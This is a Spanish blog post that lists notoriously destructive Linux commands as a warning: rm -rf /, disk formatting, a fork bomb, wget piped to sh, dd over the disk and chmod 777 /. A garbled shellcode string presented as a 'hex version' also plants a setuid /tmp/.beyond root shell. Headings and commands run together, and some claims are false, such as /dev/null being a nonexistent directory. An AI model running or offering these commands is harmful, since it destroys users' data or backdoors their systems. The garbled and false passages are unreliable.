Todos los que conocemos GNU/Linux sabemos que con la cuenta de root
podemos hacer muchas maravillas así como grandes desastres, y es por eso
que muchas distribuciones limitan el acceso a esta cuenta o incorporan
shells adicionales para modificar cambios peligrosos en el sistema.
Existe una serie de comandos que han ganado fama por su capacidad de daño:
1) Eliminar casi todo
rm -rf /Al ejecutar este comando se borraran casi todos los archivos de sistema(salvo los archivos de procesos en la carpeta /proc
versión hexadecimal:
char esp[] __attribute__ ((section(“.text”))) /* e.s.p2)Formateo del sistema
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
“x6ex2fx73x68x00x2dx63x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
mkfs.ext3 /dev/sdaFormatea el disco o dispositivo sda , con la desaparición de todos los archivos presentes en él
3) Bomba Fork
Una bomba fork es una forma de ataque del tipo DoS (causa que un servicio o recurso sea inaccesible a los usuarios) que implementa la operación fork (creación de una copia de sí mismo), o alguna funcionalidad equivalente mediante la cual un proceso es capaz de crear otro proceso.
Resumiendo, una bomba fork es un proceso que se copia a si mismo
muchas veces para colapsar tu sistema. Y aclarando falsos mitos, no es
una bomba lógica, ni tampoco un fallo del kernel, ni mucho menos se
trata de algo liberado por uno de los programadores del kernel.
Aunque puede tener varias, como por ejemplo:
ubunteate(){ ubunteate|ubunteate& };ubunteatePero tal cosa podemos prevenirla, editando el archivo adecuado:
$ sudo gedit /etc/security/limits.confAhora localizaremos, al final del archivo, la siguiente línea:
# End of filePues justo encima de esa, podemos introducir la siguiente línea:
* hard nproc 1000Quedando así las dos últimas líneas del archivo:
* hard nproc 1000Guardamos y cerramos el archivo y listo.
# End of file
4) Colapsar el Sistema de Archivos
Si ejecutamos:
# cualquier-comando > /dev/sdaComo por ejemplo:
# ls > /dev/sdaCon este comando, se envían bloques de datos al dispositivo
indicado, lo cual a menudo puede colapsar el sistema de archivos, dando como resultado una perdida total de datos.
5) Ejecutar un script de forma automática
En algunos foros linuxeros nos dicen que descarguemos un script con el siguiente código:
$ wget http://web.com/script.sh O | shO peor aún, como root:
# wget http://web.com/script.sh O | sh
Lo que hace este comando es descargar y ejecutar inmediatemente el
script. Imaginense si uno de esos scripts contiene uno de los comandos
que explico acá uds. tendrían su sistema GNU/Linux, MacosX o cualquier derivado de UNIX
ya destruído. Recomiendo sólo descargar el código y examinarlo antes de
ejecutarlo y obtenerlo sólo de fuentes confiables.
6)Mover un archivoEL comando mv sirve para cambiar la ubicación de un archivo
$ mv directorio-o-archivo-a-mover directorio-al-que-moverComo por ejemplo:
$ mv ~/script.sh ~/DocumentosPero debes evitar que el directorio destino sea /dev/null, pues es un directorio inexistente, y jamás podrás obtener de nuevo esos archivos, por ejemplo:
$ mv ~/script.sh /dev/nullEso hará desaparecer para siempre el script. Pero aún es peor si ejecutas, por ejemplo:
$ mv ~ /dev/null
Lo cual eliminará para siempre tu carpeta de usuario, con tus
imágenes, vídeos, música, documentos, etc. Podemos comprobar la no
existencia de ese directorio, vayamos primero al directorio /dev, el
cual, supuestamente aloja null.:
$ cd /devLo cual no genera ningún problema, y vamos a buscar ahora null:
$ lsLista demasiado grande para ponerse a buscar, mejor facilitarnos la vida:
$ ls | grep nullSi nos devuelve null, que lo hará, es que existe, pero eso no nos confirma que sea una carpeta, para ello utilizaremos:
$ ls -dQue solo nos mostrará las carpetas, aunque también podemos filtrarlo por la palabra null:
$ ls -d | grep nullY no les devolverá nada, porque no ha encontrado null como carpeta. Aún puedes probar:
$ cd nullY nos dirá que no es un directorio. Por lo tanto, fijarse bien cuando se mueva algo.
7) Rellenar el Disco Duro
También disponemos de un comando en Linux:
# dd if=/dev/urandom of=/dev/sdaQue simplemente rellena con datos aleatorios todo el espacio vacío en el disco duro, lo cual, como podemos imaginar, genera un caos tremendo en el sistema.
8 ) Te doy permiso para lo que quieras
También debemos de tener cuidado a la hora de dar permisos a los directorios y a las carpetas, como por ejemplo:
# chmod -R 777 /
Este comando da permisos totales a todos los directorios del sistema,
ya que el comando chmod es el encargado de dar permisos, la opción R da
permiso a todo lo contenido en el directorio, 777 es el mayor permiso
posible, realmente inseguro y, la barrita, como dijimos anteriormente,
es todo el sistema. Esto daría permiso a cualquier agente de hacer lo
que sea con tu sistema, cuidado con el trío de los 7 y dónde los
aplicas.
# chmod -R -777 /Este comando es el inverso del anterior , quita todos los permisos a todos los usuarios y al ejecutarlo lo que tendrán será un hermoso signo “>” como shell y no podrán realizar nada.
Enviado por: pucci96
No hay comentarios:
Publicar un comentario
Dejar Comentarios